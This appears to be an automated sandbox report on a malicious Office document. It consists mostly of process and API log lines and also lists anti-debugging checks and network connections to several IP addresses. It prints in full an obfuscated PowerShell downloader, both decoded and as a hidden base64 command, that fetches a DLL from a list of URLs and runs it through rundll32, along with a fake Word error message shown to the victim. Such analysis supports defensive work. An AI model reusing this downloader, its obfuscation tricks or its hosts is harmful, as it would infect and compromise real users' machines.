                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5292Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-10144
                Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-10492
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep count: 3647 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep count: 5292 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6200Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A461 FindFirstFileW,8_2_00F4A461
                Source: svchost.exe, 0000000F.00000002.762491532.0000027963AFC000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: powershell.exe, 00000004.00000002.701036480.000002712B822000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWB7%SystemRoot%\system32\mswsock.dllBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwBy
                Source: svchost.exe, 0000000F.00000002.762477860.0000027963AED000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000F.00000002.762378344.0000027963A82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-10494
                Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-10232
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind6_2_10002460
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10007528
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,6_2_10013BFB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4166C mov eax, dword ptr fs:[00000030h]8_2_00F4166C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,6_2_10004500
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10007528
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_10009F26
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10006F64

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 97.120.3.198 80Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 70.180.33.202 80Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 50.116.111.59 144Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 173.249.20.233 187Jump to behavior
                Encrypted powershell cmdline option foundShow sources
                Source: unknownProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQ